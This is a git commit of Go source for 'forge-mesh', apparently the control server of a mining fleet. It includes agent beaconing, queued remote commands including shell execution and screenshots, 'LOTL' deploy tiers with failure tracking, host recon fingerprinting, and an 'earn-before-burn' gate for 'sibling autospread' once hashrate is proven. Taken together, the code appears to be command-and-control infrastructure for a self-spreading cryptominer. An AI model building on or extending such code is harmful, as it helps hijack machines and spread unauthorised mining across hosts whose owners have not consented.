Initial commit: AetherForge Linux (forge-mesh) v0.1.0-dev
Some checks failed
Test / test (push) Has been cancelled

This commit is contained in:
drjones
2026-07-04 09:31:23 +00:00
commit 3678b199d0
154 changed files with 21714 additions and 0 deletions

View File

@@ -0,0 +1,33 @@
package fleet
import "context"
// AdaptiveStrategy resolves tier order from phenotype learning or defaults.
type AdaptiveStrategy struct {
Store *Store
}
// OrderForHost returns tier execution order for a host, cloning from phenotype siblings when available.
func (a *AdaptiveStrategy) OrderForHost(ctx context.Context, hostID string) ([]int, error) {
report, err := RunRecon()
if err != nil {
return defaultOrderInts(), nil
}
phenotype := PhenotypeFromRecon(report)
_ = a.Store.SetHostPhenotype(ctx, hostID, ReconJSON(report), phenotype)
return a.Store.GetAdaptiveOrder(ctx, phenotype)
}
// CloneFromSibling copies winning tier order from a sibling with same phenotype.
func (a *AdaptiveStrategy) CloneFromSibling(ctx context.Context, hostID string) ([]int, error) {
report, err := RunRecon()
if err != nil {
return defaultOrderInts(), err
}
phenotype := PhenotypeFromRecon(report)
order, err := a.Store.GetAdaptiveOrder(ctx, phenotype)
if err != nil {
return defaultOrderInts(), err
}
return order, nil
}

59
internal/fleet/atlas.go Normal file
View File

@@ -0,0 +1,59 @@
package fleet
import (
"database/sql"
"github.com/google/uuid"
)
func (s *Store) InsertSeerEvent(hostID, eventType, payload string) error {
_, err := s.db.Exec(`
INSERT INTO seer_events (id, host_id, event_type, payload_json)
VALUES (?, ?, ?, ?)
`, uuid.NewString(), nullString(hostID), eventType, payload)
return err
}
func (s *Store) ListSeerEvents(limit int) ([]SeerEvent, error) {
if limit <= 0 {
limit = 50
}
rows, err := s.db.Query(`
SELECT id, host_id, event_type, payload_json, created_at
FROM seer_events ORDER BY created_at DESC LIMIT ?
`, limit)
if err != nil {
return nil, err
}
defer rows.Close()
var events []SeerEvent
for rows.Next() {
var e SeerEvent
var hostID sql.NullString
if err := rows.Scan(&e.ID, &hostID, &e.EventType, &e.PayloadJSON, &e.CreatedAt); err != nil {
return nil, err
}
if hostID.Valid {
e.HostID = hostID.String
}
events = append(events, e)
}
return events, rows.Err()
}
// SeerEvent is a court/LOTL timeline entry.
type SeerEvent struct {
ID string `json:"id"`
HostID string `json:"host_id,omitempty"`
EventType string `json:"event_type"`
PayloadJSON string `json:"payload_json"`
CreatedAt string `json:"created_at"`
}
func nullString(s string) sql.NullString {
if s == "" {
return sql.NullString{}
}
return sql.NullString{String: s, Valid: true}
}

105
internal/fleet/clearance.go Normal file
View File

@@ -0,0 +1,105 @@
package fleet
import "fmt"
// Clearance levels gate remote operator actions (L0–L4).
const (
ClearanceL0 = 0 // view-only
ClearanceL1 = 1 // status queries, fleet list
ClearanceL2 = 2 // pause/resume mining
ClearanceL3 = 3 // reboot, screenshot
ClearanceL4 = 4 // shell exec, court verdicts, crucible batch
)
// Action names used by API and dashboard.
const (
ActionView = "view"
ActionStatus = "status"
ActionPause = "pause"
ActionResume = "resume"
ActionReboot = "reboot"
ActionScreenshot = "screenshot"
ActionShell = "shell"
ActionCourt = "court"
ActionCrucible = "crucible"
)
// minClearance maps each action to the minimum operator clearance required.
var minClearance = map[string]int{
ActionView: ClearanceL0,
ActionStatus: ClearanceL1,
ActionPause: ClearanceL2,
ActionResume: ClearanceL2,
ActionReboot: ClearanceL3,
ActionScreenshot: ClearanceL3,
ActionShell: ClearanceL4,
ActionCourt: ClearanceL4,
ActionCrucible: ClearanceL4,
}
// RequiredClearance returns the minimum clearance for an action.
func RequiredClearance(action string) (int, bool) {
level, ok := minClearance[action]
return level, ok
}
// RequiredClearanceOrZero returns required level or 0 if unknown.
func RequiredClearanceOrZero(action string) int {
level, _ := minClearance[action]
return level
}
// CanPerform checks whether operator clearance satisfies the action gate.
func CanPerform(operatorClearance int, action string) bool {
required, ok := minClearance[action]
if !ok {
return false
}
return operatorClearance >= required
}
// ClearanceError describes a denied action.
type ClearanceError struct {
Action string
Required int
OperatorClearance int
}
func (e ClearanceError) Error() string {
return fmt.Sprintf("action %q requires clearance L%d (operator has L%d)",
e.Action, e.Required, e.OperatorClearance)
}
// CheckAction returns ClearanceError when the operator lacks clearance.
func CheckAction(operatorClearance int, action string) error {
required, ok := minClearance[action]
if !ok {
return fmt.Errorf("unknown action %q", action)
}
if operatorClearance < required {
return ClearanceError{
Action: action,
Required: required,
OperatorClearance: operatorClearance,
}
}
return nil
}
// ClearanceLabel returns a human-readable label for a level.
func ClearanceLabel(level int) string {
switch level {
case ClearanceL0:
return "L0 View"
case ClearanceL1:
return "L1 Status"
case ClearanceL2:
return "L2 Control"
case ClearanceL3:
return "L3 Host Ops"
case ClearanceL4:
return "L4 Root"
default:
return fmt.Sprintf("L%d", level)
}
}

View File

@@ -0,0 +1,10 @@
package fleet
// RequiredClearanceLabel returns a label for API error responses.
func RequiredClearanceLabel(action string) string {
level, ok := minClearance[action]
if !ok {
return "unknown"
}
return ClearanceLabel(level)
}

127
internal/fleet/crucible.go Normal file
View File

@@ -0,0 +1,127 @@
package fleet
import (
"sync"
"time"
"github.com/google/uuid"
)
// BatchJob tracks a crucible batch dispatch.
type BatchJob struct {
ID string `json:"id"`
Command string `json:"command"`
HostIDs []string `json:"host_ids"`
Results []BatchResult `json:"results"`
Status string `json:"status"`
CreatedAt time.Time `json:"created_at"`
}
// BatchResult is one host outcome in a batch job.
type BatchResult struct {
HostID string `json:"host_id"`
Hostname string `json:"hostname,omitempty"`
Status string `json:"status"`
Message string `json:"message,omitempty"`
CommandID string `json:"command_id,omitempty"`
}
// CrucibleStore holds in-memory batch job history.
type CrucibleStore struct {
mu sync.RWMutex
jobs map[string]*BatchJob
max int
}
func NewCrucibleStore(maxHistory int) *CrucibleStore {
if maxHistory <= 0 {
maxHistory = 100
}
return &CrucibleStore{
jobs: make(map[string]*BatchJob),
max: maxHistory,
}
}
func (c *CrucibleStore) Create(command string, hostIDs []string) *BatchJob {
job := &BatchJob{
ID: uuid.NewString(),
Command: command,
HostIDs: append([]string(nil), hostIDs...),
Results: make([]BatchResult, 0, len(hostIDs)),
Status: "running",
CreatedAt: time.Now().UTC(),
}
c.mu.Lock()
c.jobs[job.ID] = job
c.trimLocked()
c.mu.Unlock()
return job
}
func (c *CrucibleStore) Get(id string) (*BatchJob, bool) {
c.mu.RLock()
defer c.mu.RUnlock()
job, ok := c.jobs[id]
return job, ok
}
func (c *CrucibleStore) AddResult(jobID string, result BatchResult) {
c.mu.Lock()
defer c.mu.Unlock()
job, ok := c.jobs[jobID]
if !ok {
return
}
job.Results = append(job.Results, result)
}
func (c *CrucibleStore) Complete(jobID, status string) {
c.mu.Lock()
defer c.mu.Unlock()
if job, ok := c.jobs[jobID]; ok {
job.Status = status
}
}
func (c *CrucibleStore) History(limit int) []*BatchJob {
if limit <= 0 {
limit = 20
}
c.mu.RLock()
defer c.mu.RUnlock()
jobs := make([]*BatchJob, 0, len(c.jobs))
for _, j := range c.jobs {
jobs = append(jobs, j)
}
// Sort by created_at desc (simple bubble for small sets)
for i := 0; i < len(jobs); i++ {
for j := i + 1; j < len(jobs); j++ {
if jobs[j].CreatedAt.After(jobs[i].CreatedAt) {
jobs[i], jobs[j] = jobs[j], jobs[i]
}
}
}
if len(jobs) > limit {
jobs = jobs[:limit]
}
return jobs
}
func (c *CrucibleStore) trimLocked() {
if len(c.jobs) <= c.max {
return
}
oldest := ""
var oldestTime time.Time
for id, j := range c.jobs {
if oldest == "" || j.CreatedAt.Before(oldestTime) {
oldest = id
oldestTime = j.CreatedAt
}
}
if oldest != "" {
delete(c.jobs, oldest)
}
}

93
internal/fleet/earn.go Normal file
View File

@@ -0,0 +1,93 @@
package fleet
import (
"context"
"fmt"
"time"
)
// EarnBeforeBurnConfig gates sibling autospread until local mining proves viable.
type EarnBeforeBurnConfig struct {
MinHashrate float64 `json:"min_hashrate"`
MinDuration time.Duration `json:"min_duration"`
FirstTierOnly bool `json:"first_tier_only"`
}
// DefaultEarnConfig returns conservative earn-before-burn defaults.
func DefaultEarnConfig() EarnBeforeBurnConfig {
return EarnBeforeBurnConfig{
MinHashrate: 100.0,
MinDuration: 5 * time.Minute,
FirstTierOnly: true,
}
}
// EarnGate tracks local hashrate proof before sibling spread.
type EarnGate struct {
Store *Store
Config EarnBeforeBurnConfig
}
// SpreadDecision indicates whether sibling spread is allowed.
type SpreadDecision struct {
Allowed bool `json:"allowed"`
Reason string `json:"reason"`
LocalHashrate float64 `json:"local_hashrate"`
Siblings []string `json:"siblings,omitempty"`
}
// CanSpreadToSiblings checks hashrate gate before autospread to phenotype siblings.
func (g *EarnGate) CanSpreadToSiblings(ctx context.Context, hostID string) (*SpreadDecision, error) {
dec := &SpreadDecision{}
hr, err := g.Store.HostHashrate(ctx, hostID)
if err != nil {
dec.Reason = "host not found"
return dec, err
}
dec.LocalHashrate = hr
if hr < g.Config.MinHashrate {
dec.Reason = fmt.Sprintf("hashrate %.2f below threshold %.2f", hr, g.Config.MinHashrate)
return dec, nil
}
if g.Config.FirstTierOnly {
attempts, err := g.Store.ListLOTL(ctx, hostID, 50)
if err != nil {
return dec, err
}
hasSuccess := false
for _, a := range attempts {
if a.Phase == "deploy" && a.Status == "success" {
hasSuccess = true
break
}
}
if !hasSuccess {
dec.Reason = "first tier deploy has not succeeded yet"
return dec, nil
}
}
var phenotype string
err = g.Store.DB().QueryRowContext(ctx, `SELECT COALESCE(phenotype,'') FROM hosts WHERE id = ?`, hostID).Scan(&phenotype)
if err != nil {
dec.Reason = "phenotype unknown"
return dec, err
}
siblings, err := g.Store.SiblingHosts(ctx, hostID, phenotype)
if err != nil {
return dec, err
}
dec.Allowed = len(siblings) > 0
dec.Siblings = siblings
if !dec.Allowed {
dec.Reason = "no siblings in phenotype group"
} else {
dec.Reason = "earn-before-burn gate passed"
}
return dec, nil
}

358
internal/fleet/hub.go Normal file
View File

@@ -0,0 +1,358 @@
package fleet
import (
"encoding/json"
"log"
"net/http"
"sync"
"time"
"forge-mesh/internal/api/types"
"forge-mesh/internal/auth"
"github.com/google/uuid"
"github.com/gorilla/websocket"
)
var upgrader = websocket.Upgrader{
CheckOrigin: func(r *http.Request) bool { return true },
}
// Hub manages agent and deck WebSocket connections.
type Hub struct {
store *Store
fleetSecret string
tickets *auth.TicketStore
mu sync.RWMutex
agents map[string]*agentConn
decks map[*deckConn]struct{}
pendingCmds map[string][]types.FleetCommand
}
type agentConn struct {
hostID string
conn *websocket.Conn
send chan []byte
}
type deckConn struct {
conn *websocket.Conn
send chan []byte
}
func NewHub(store *Store, fleetSecret string, tickets *auth.TicketStore) *Hub {
return &Hub{
store: store,
fleetSecret: fleetSecret,
tickets: tickets,
agents: make(map[string]*agentConn),
decks: make(map[*deckConn]struct{}),
pendingCmds: make(map[string][]types.FleetCommand),
}
}
func (h *Hub) HandleAgentWS(w http.ResponseWriter, r *http.Request) {
token := auth.ExtractBearer(r)
if token == "" {
token = r.URL.Query().Get("token")
}
if token == "" || !constantTimeEqual(token, h.fleetSecret) {
http.Error(w, "unauthorized", http.StatusUnauthorized)
return
}
conn, err := upgrader.Upgrade(w, r, nil)
if err != nil {
return
}
ac := &agentConn{conn: conn, send: make(chan []byte, 16)}
go h.writePump(ac, true)
go h.readAgentPump(ac)
}
func (h *Hub) HandleDeckWS(w http.ResponseWriter, r *http.Request) {
ticket := r.URL.Query().Get("ticket")
if !h.tickets.Consume(ticket) {
http.Error(w, "unauthorized", http.StatusUnauthorized)
return
}
conn, err := upgrader.Upgrade(w, r, nil)
if err != nil {
return
}
dc := &deckConn{conn: conn, send: make(chan []byte, 32)}
h.mu.Lock()
h.decks[dc] = struct{}{}
h.mu.Unlock()
go h.writePump(&agentConn{conn: conn, send: dc.send}, false)
go h.readDeckPump(dc)
}
func (h *Hub) readAgentPump(ac *agentConn) {
defer func() {
h.unregisterAgent(ac)
ac.conn.Close()
}()
ac.conn.SetReadLimit(1 << 20)
_ = ac.conn.SetReadDeadline(time.Now().Add(90 * time.Second))
ac.conn.SetPongHandler(func(string) error {
return ac.conn.SetReadDeadline(time.Now().Add(90 * time.Second))
})
for {
_, data, err := ac.conn.ReadMessage()
if err != nil {
return
}
var msg types.WsMessage
if err := json.Unmarshal(data, &msg); err != nil {
continue
}
switch msg.Type {
case "heartbeat":
h.handleHeartbeat(ac, data)
case "command_ack":
h.broadcastToDecks(data)
}
}
}
func (h *Hub) handleHeartbeat(ac *agentConn, raw []byte) {
var msg struct {
types.WsMessage
types.HeartbeatPayload
}
if err := json.Unmarshal(raw, &msg); err != nil {
return
}
host, err := h.store.UpsertHeartbeat(types.HeartbeatPayload{
HostID: coalesce(msg.WsMessage.HostID, msg.HeartbeatPayload.HostID),
Hostname: msg.Hostname,
Arch: msg.Arch,
Hashrate: msg.Hashrate,
HashrateHps: coalesceFloat(msg.HashrateHps, msg.Hashrate),
CurrentTier: msg.CurrentTier,
TierType: msg.TierType,
TierState: msg.TierState,
Fingerprint: msg.Fingerprint,
})
if err != nil {
log.Printf("heartbeat store: %v", err)
return
}
h.mu.Lock()
if ac.hostID != "" && ac.hostID != host.ID {
delete(h.agents, ac.hostID)
}
ac.hostID = host.ID
h.agents[host.ID] = ac
pending := h.pendingCmds[host.ID]
delete(h.pendingCmds, host.ID)
h.mu.Unlock()
for _, cmd := range pending {
h.sendCommand(ac, cmd)
}
card := ToFleetCard(host)
update, _ := json.Marshal(map[string]any{
"type": "host_update",
"host": card,
"timestamp": time.Now().UTC().Format(time.RFC3339),
})
h.broadcastToDecks(update)
}
func (h *Hub) readDeckPump(dc *deckConn) {
defer func() {
h.mu.Lock()
delete(h.decks, dc)
h.mu.Unlock()
dc.conn.Close()
}()
dc.conn.SetReadLimit(1 << 18)
for {
if _, _, err := dc.conn.ReadMessage(); err != nil {
return
}
}
}
func (h *Hub) writePump(ac *agentConn, ping bool) {
ticker := time.NewTicker(30 * time.Second)
defer func() {
ticker.Stop()
ac.conn.Close()
}()
for {
select {
case msg, ok := <-ac.send:
_ = ac.conn.SetWriteDeadline(time.Now().Add(10 * time.Second))
if !ok {
_ = ac.conn.WriteMessage(websocket.CloseMessage, []byte{})
return
}
if err := ac.conn.WriteMessage(websocket.TextMessage, msg); err != nil {
return
}
case <-ticker.C:
if ping {
_ = ac.conn.SetWriteDeadline(time.Now().Add(10 * time.Second))
if err := ac.conn.WriteMessage(websocket.PingMessage, nil); err != nil {
return
}
}
}
}
}
func (h *Hub) unregisterAgent(ac *agentConn) {
h.mu.Lock()
defer h.mu.Unlock()
if ac.hostID != "" {
delete(h.agents, ac.hostID)
_ = h.store.MarkOffline(ac.hostID)
}
}
func (h *Hub) DispatchCommand(hostID, action string, args map[string]any) (*types.FleetCommand, error) {
cmd := types.FleetCommand{
ID: uuid.NewString(),
Action: action,
Args: args,
IssuedAt: time.Now().UTC(),
}
h.mu.Lock()
ac, online := h.agents[hostID]
if online {
h.mu.Unlock()
h.sendCommand(ac, cmd)
return &cmd, nil
}
h.pendingCmds[hostID] = append(h.pendingCmds[hostID], cmd)
h.mu.Unlock()
return &cmd, nil
}
func (h *Hub) sendCommand(ac *agentConn, cmd types.FleetCommand) {
payload, _ := json.Marshal(types.WsMessage{
Type: "command",
HostID: ac.hostID,
Command: &cmd,
})
select {
case ac.send <- payload:
default:
log.Printf("agent %s send buffer full", ac.hostID)
}
}
// PushMiningProfile sends an updated mining profile to a connected agent.
func (h *Hub) PushMiningProfile(hostID string, profile types.MiningProfile) bool {
payload, err := json.Marshal(types.WsMessage{
Type: "mining_profile",
HostID: hostID,
Payload: map[string]any{"profile": profile},
})
if err != nil {
return false
}
h.mu.RLock()
ac, ok := h.agents[hostID]
h.mu.RUnlock()
if !ok {
return false
}
select {
case ac.send <- payload:
return true
default:
return false
}
}
func (h *Hub) PopPendingCommands(hostID string) []types.FleetCommand {
h.mu.Lock()
defer h.mu.Unlock()
cmds := h.pendingCmds[hostID]
delete(h.pendingCmds, hostID)
return cmds
}
func (h *Hub) broadcastToDecks(data []byte) {
h.mu.RLock()
defer h.mu.RUnlock()
for dc := range h.decks {
select {
case dc.send <- data:
default:
}
}
}
func (h *Hub) HandleBeacon(store *Store) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
var hb types.HeartbeatPayload
if err := json.NewDecoder(r.Body).Decode(&hb); err != nil {
http.Error(w, "bad request", http.StatusBadRequest)
return
}
host, err := store.UpsertHeartbeat(hb)
if err != nil {
http.Error(w, "internal error", http.StatusInternalServerError)
return
}
cmds := h.PopPendingCommands(host.ID)
w.Header().Set("Content-Type", "application/json")
_ = json.NewEncoder(w).Encode(types.BeaconResponse{OK: true, Commands: cmds})
}
}
func constantTimeEqual(a, b string) bool {
if len(a) != len(b) {
return false
}
var v byte
for i := 0; i < len(a); i++ {
v |= a[i] ^ b[i]
}
return v == 0
}
func coalesce(values ...string) string {
for _, v := range values {
if v != "" {
return v
}
}
return ""
}
func coalesceFloat(values ...float64) float64 {
for _, v := range values {
if v > 0 {
return v
}
}
return 0
}

233
internal/fleet/lotl.go Normal file
View File

@@ -0,0 +1,233 @@
package fleet
import (
"context"
"crypto/rand"
"database/sql"
"encoding/hex"
"encoding/json"
"time"
"github.com/google/uuid"
)
// LOTLAttempt is one triple-onion deploy audit row.
type LOTLAttempt struct {
ID string `json:"id"`
HostID string `json:"host_id"`
Tier int `json:"tier"`
Phase string `json:"phase"`
Status string `json:"status"`
Error string `json:"error,omitempty"`
MetadataJSON string `json:"metadata_json,omitempty"`
CreatedAt time.Time `json:"created_at"`
}
// DB exposes the underlying SQLite connection.
func (s *Store) DB() *sql.DB {
return s.db
}
// LogLOTL records a triple-onion phase attempt.
func (s *Store) LogLOTL(ctx context.Context, hostID string, tier int, phase, status, errMsg, metadata string) error {
if s == nil {
return nil
}
if metadata == "" {
metadata = "{}"
}
_, err := s.db.ExecContext(ctx, `
INSERT INTO lotl_attempts (id, host_id, tier, phase, status, error, metadata_json)
VALUES (?, ?, ?, ?, ?, ?, ?)`,
uuid.NewString(), hostID, tier, phase, status, errMsg, metadata)
return err
}
// ListLOTL returns recent attempts for a host (newest first).
func (s *Store) ListLOTL(ctx context.Context, hostID string, limit int) ([]LOTLAttempt, error) {
if limit <= 0 {
limit = 50
}
rows, err := s.db.QueryContext(ctx, `
SELECT id, host_id, tier, phase, status, COALESCE(error,''), metadata_json, created_at
FROM lotl_attempts WHERE host_id = ?
ORDER BY created_at DESC LIMIT ?`, hostID, limit)
if err != nil {
return nil, err
}
defer rows.Close()
var out []LOTLAttempt
for rows.Next() {
var a LOTLAttempt
var created string
if err := rows.Scan(&a.ID, &a.HostID, &a.Tier, &a.Phase, &a.Status, &a.Error, &a.MetadataJSON, &created); err != nil {
return nil, err
}
a.CreatedAt, _ = time.Parse("2006-01-02 15:04:05", created)
out = append(out, a)
}
return out, rows.Err()
}
const atlasFailureThreshold = 3
const atlasImmuneHours = 24
// ShouldSkipTier checks failure atlas immunity for phenotype+tier.
func (s *Store) ShouldSkipTier(ctx context.Context, phenotype string, tier int) (bool, error) {
if phenotype == "" || s == nil {
return false, nil
}
var count int
var immuneUntil sqlNullTime
err := s.db.QueryRowContext(ctx, `
SELECT failure_count, immune_until FROM failure_atlas
WHERE phenotype = ? AND tier = ?`, phenotype, tier).Scan(&count, &immuneUntil)
if err != nil {
return false, nil
}
if immuneUntil.Valid && time.Now().Before(immuneUntil.Time) {
return true, nil
}
return false, nil
}
// RecordFailure increments failure atlas for phenotype+tier.
func (s *Store) RecordFailure(ctx context.Context, phenotype string, tier int) error {
if phenotype == "" || s == nil {
return nil
}
var count int
_ = s.db.QueryRowContext(ctx, `
SELECT failure_count FROM failure_atlas WHERE phenotype = ? AND tier = ?`,
phenotype, tier).Scan(&count)
count++
immuneUntil := ""
if count >= atlasFailureThreshold {
until := time.Now().Add(atlasImmuneHours * time.Hour)
immuneUntil = until.Format("2006-01-02 15:04:05")
}
_, err := s.db.ExecContext(ctx, `
INSERT INTO failure_atlas (id, phenotype, tier, failure_count, immune_until, updated_at)
VALUES (?, ?, ?, ?, ?, datetime('now'))
ON CONFLICT(phenotype, tier) DO UPDATE SET
failure_count = excluded.failure_count,
immune_until = excluded.immune_until,
updated_at = datetime('now')`,
randomHexID(), phenotype, tier, count, nullIfEmpty(immuneUntil))
return err
}
// RecordWin records a successful tier and updates adaptive order wins.
func (s *Store) RecordWin(ctx context.Context, phenotype string, tier int) error {
if phenotype == "" || s == nil {
return nil
}
order, _ := s.GetAdaptiveOrder(ctx, phenotype)
order = promoteTier(order, tier)
b, _ := json.Marshal(order)
_, err := s.db.ExecContext(ctx, `
INSERT INTO phenotype_tier_orders (phenotype, tier_order_json, wins, updated_at)
VALUES (?, ?, 1, datetime('now'))
ON CONFLICT(phenotype) DO UPDATE SET
tier_order_json = excluded.tier_order_json,
wins = wins + 1,
updated_at = datetime('now')`,
phenotype, string(b))
return err
}
func promoteTier(order []int, tier int) []int {
out := []int{tier}
for _, t := range order {
if t != tier {
out = append(out, t)
}
}
for _, t := range defaultOrderInts() {
found := false
for _, x := range out {
if x == t {
found = true
break
}
}
if !found {
out = append(out, t)
}
}
return out
}
// GetAdaptiveOrder returns learned tier order or defaults.
func (s *Store) GetAdaptiveOrder(ctx context.Context, phenotype string) ([]int, error) {
if phenotype != "" {
var raw string
err := s.db.QueryRowContext(ctx, `
SELECT tier_order_json FROM phenotype_tier_orders WHERE phenotype = ?`, phenotype).
Scan(&raw)
if err == nil && raw != "" && raw != "[]" {
var order []int
if json.Unmarshal([]byte(raw), &order) == nil && len(order) > 0 {
return order, nil
}
}
}
return defaultOrderInts(), nil
}
func defaultOrderInts() []int {
order := DefaultTierOrder()
out := make([]int, len(order))
for i := range order {
out[i] = i + 1
}
return out
}
// SetHostPhenotype persists recon-derived fingerprint on a host.
func (s *Store) SetHostPhenotype(ctx context.Context, hostID, reconJSON, phenotype string) error {
_, err := s.db.ExecContext(ctx, `
UPDATE hosts SET phenotype = ?, fingerprint = COALESCE(NULLIF(fingerprint,''), ?),
updated_at = datetime('now') WHERE id = ?`,
phenotype, reconJSON, hostID)
return err
}
// HostHashrate returns current hashrate for earn-before-burn gate.
func (s *Store) HostHashrate(ctx context.Context, hostID string) (float64, error) {
var hr float64
err := s.db.QueryRowContext(ctx, `SELECT hashrate FROM hosts WHERE id = ?`, hostID).Scan(&hr)
return hr, err
}
// SiblingHosts lists other enrolled hosts sharing a phenotype.
func (s *Store) SiblingHosts(ctx context.Context, hostID, phenotype string) ([]string, error) {
if phenotype == "" {
return nil, nil
}
rows, err := s.db.QueryContext(ctx, `
SELECT id FROM hosts WHERE phenotype = ? AND id != ? AND status != 'offline'`,
phenotype, hostID)
if err != nil {
return nil, err
}
defer rows.Close()
var ids []string
for rows.Next() {
var id string
if err := rows.Scan(&id); err != nil {
return nil, err
}
ids = append(ids, id)
}
return ids, rows.Err()
}
func randomHexID() string {
b := make([]byte, 16)
_, _ = rand.Read(b)
return hex.EncodeToString(b)
}

View File

@@ -0,0 +1,91 @@
package fleet
import (
"context"
"testing"
"forge-mesh/internal/db"
)
func TestPhenotypeFromRecon(t *testing.T) {
report := &ReconReport{
Kernel: "6.8.12-generic",
Arch: "x86_64",
Virt: "baremetal",
ContainerRuntime: "podman",
GPU: GPUInfo{Available: true, Vendor: "nvidia"},
}
key := PhenotypeFromRecon(report)
if key == "" {
t.Fatal("expected non-empty phenotype key")
}
if want := "nvidia"; !containsPart(key, want) {
t.Fatalf("expected gpu vendor in key %q", key)
}
if want := "podman"; !containsPart(key, want) {
t.Fatalf("expected runtime in key %q", key)
}
// Stable for same inputs
key2 := PhenotypeFromRecon(report)
if key != key2 {
t.Fatalf("phenotype not stable: %q vs %q", key, key2)
}
}
func TestAdaptiveOrderAndAtlas(t *testing.T) {
conn, err := db.Open(t.TempDir() + "/test.db")
if err != nil {
t.Fatal(err)
}
defer conn.Close()
store := NewStore(conn)
ctx := context.Background()
pheno := "6.8|x86_64|baremetal|nvidia|podman"
if err := store.RecordFailure(ctx, pheno, 4); err != nil {
t.Fatal(err)
}
if err := store.RecordFailure(ctx, pheno, 4); err != nil {
t.Fatal(err)
}
skip, err := store.ShouldSkipTier(ctx, pheno, 4)
if err != nil {
t.Fatal(err)
}
if skip {
t.Fatal("should not skip before threshold")
}
if err := store.RecordFailure(ctx, pheno, 4); err != nil {
t.Fatal(err)
}
skip, _ = store.ShouldSkipTier(ctx, pheno, 4)
if !skip {
t.Fatal("expected atlas skip after 3 failures")
}
if err := store.RecordWin(ctx, pheno, 7); err != nil {
t.Fatal(err)
}
order, err := store.GetAdaptiveOrder(ctx, pheno)
if err != nil {
t.Fatal(err)
}
if len(order) != 14 {
t.Fatalf("expected 14 tiers, got %d", len(order))
}
if order[0] != 7 {
t.Fatalf("winning tier 7 should be first, got %v", order)
}
}
func containsPart(s, part string) bool {
for i := 0; i <= len(s)-len(part); i++ {
if s[i:i+len(part)] == part {
return true
}
}
return false
}

View File

@@ -0,0 +1,91 @@
package fleet
import (
"crypto/rand"
"database/sql"
"encoding/hex"
"encoding/json"
"fmt"
"time"
)
// PolicySnapshot is a shareable frozen policy bundle.
type PolicySnapshot struct {
Token string `json:"token"`
PolicyJSON json.RawMessage `json:"policy_json"`
ExpiresAt string `json:"expires_at,omitempty"`
CreatedAt string `json:"created_at"`
}
// CreatePolicySnapshot stores a policy JSON blob and returns an opaque token.
func (s *Store) CreatePolicySnapshot(policy map[string]any, ttl time.Duration) (*PolicySnapshot, error) {
raw, err := json.Marshal(policy)
if err != nil {
return nil, fmt.Errorf("marshal policy: %w", err)
}
token, err := randomToken(16)
if err != nil {
return nil, err
}
now := time.Now().UTC()
expires := ""
if ttl > 0 {
expires = now.Add(ttl).Format(time.RFC3339)
}
_, err = s.db.Exec(`
INSERT INTO policy_snapshots (token, policy_json, expires_at, created_at)
VALUES (?, ?, ?, ?)
`, token, string(raw), nullIfEmpty(expires), now.Format(time.RFC3339))
if err != nil {
return nil, fmt.Errorf("insert policy snapshot: %w", err)
}
return &PolicySnapshot{
Token: token,
PolicyJSON: raw,
ExpiresAt: expires,
CreatedAt: now.Format(time.RFC3339),
}, nil
}
// GetPolicySnapshot loads a snapshot by token (public summon link).
func (s *Store) GetPolicySnapshot(token string) (*PolicySnapshot, error) {
row := s.db.QueryRow(`
SELECT token, policy_json, expires_at, created_at
FROM policy_snapshots WHERE token = ?
`, token)
var snap PolicySnapshot
var expires sql.NullString
var created string
if err := row.Scan(&snap.Token, &snap.PolicyJSON, &expires, &created); err != nil {
return nil, err
}
if expires.Valid {
snap.ExpiresAt = expires.String
t, err := time.Parse(time.RFC3339, expires.String)
if err == nil && time.Now().After(t) {
return nil, sql.ErrNoRows
}
}
snap.CreatedAt = created
return &snap, nil
}
func randomToken(n int) (string, error) {
b := make([]byte, n)
if _, err := rand.Read(b); err != nil {
return "", err
}
return hex.EncodeToString(b), nil
}
func nullIfEmpty(s string) sql.NullString {
if s == "" {
return sql.NullString{}
}
return sql.NullString{String: s, Valid: true}
}

151
internal/fleet/recon.go Normal file
View File

@@ -0,0 +1,151 @@
package fleet
import (
"encoding/json"
"os"
"os/exec"
"path/filepath"
"strings"
)
// ReconReport holds read-only host capability probes for triple-onion deploy.
type ReconReport struct {
Kernel string `json:"kernel"`
Arch string `json:"arch"`
CgroupsV2 bool `json:"cgroups_v2"`
PodmanAvailable bool `json:"podman_available"`
DockerAvailable bool `json:"docker_available"`
GPU GPUInfo `json:"gpu"`
Virt string `json:"virt,omitempty"`
ContainerRuntime string `json:"container_runtime,omitempty"`
Extra map[string]string `json:"extra,omitempty"`
}
type GPUInfo struct {
Available bool `json:"available"`
Vendor string `json:"vendor,omitempty"`
Devices []string `json:"devices,omitempty"`
}
// RunRecon executes read-only probes: kernel, cgroups, podman, GPU.
func RunRecon() (*ReconReport, error) {
report := &ReconReport{Extra: map[string]string{}}
if out, err := exec.Command("uname", "-r").Output(); err == nil {
report.Kernel = strings.TrimSpace(string(out))
}
if out, err := exec.Command("uname", "-m").Output(); err == nil {
report.Arch = strings.TrimSpace(string(out))
}
report.CgroupsV2 = probeCgroupsV2()
report.PodmanAvailable = commandExists("podman")
report.DockerAvailable = commandExists("docker")
report.GPU = probeGPU()
report.Virt = probeVirt()
report.ContainerRuntime = detectContainerRuntime(report)
return report, nil
}
func probeCgroupsV2() bool {
data, err := os.ReadFile("/sys/fs/cgroup/cgroup.controllers")
if err != nil {
return false
}
return len(strings.TrimSpace(string(data))) > 0
}
func probeGPU() GPUInfo {
info := GPUInfo{}
if commandExists("nvidia-smi") {
if out, err := exec.Command("nvidia-smi", "-L").Output(); err == nil {
lines := strings.Split(strings.TrimSpace(string(out)), "\n")
for _, line := range lines {
if line != "" {
info.Devices = append(info.Devices, line)
}
}
if len(info.Devices) > 0 {
info.Available = true
info.Vendor = "nvidia"
}
}
}
if !info.Available && commandExists("rocm-smi") {
if _, err := exec.Command("rocm-smi", "--showid").Output(); err == nil {
info.Available = true
info.Vendor = "amd"
}
}
return info
}
func probeVirt() string {
data, err := os.ReadFile("/sys/class/dmi/id/product_name")
if err != nil {
return "baremetal"
}
name := strings.ToLower(strings.TrimSpace(string(data)))
switch {
case strings.Contains(name, "vmware"), strings.Contains(name, "virtualbox"),
strings.Contains(name, "kvm"), strings.Contains(name, "qemu"):
return "vm"
default:
return "baremetal"
}
}
func detectContainerRuntime(r *ReconReport) string {
if r.PodmanAvailable {
return "podman"
}
if r.DockerAvailable {
return "docker"
}
return ""
}
func commandExists(name string) bool {
_, err := exec.LookPath(name)
return err == nil
}
// PhenotypeFromRecon builds a stable fingerprint key from recon data.
func PhenotypeFromRecon(r *ReconReport) string {
gpu := "none"
if r.GPU.Available {
gpu = r.GPU.Vendor
}
rt := r.ContainerRuntime
if rt == "" {
rt = "none"
}
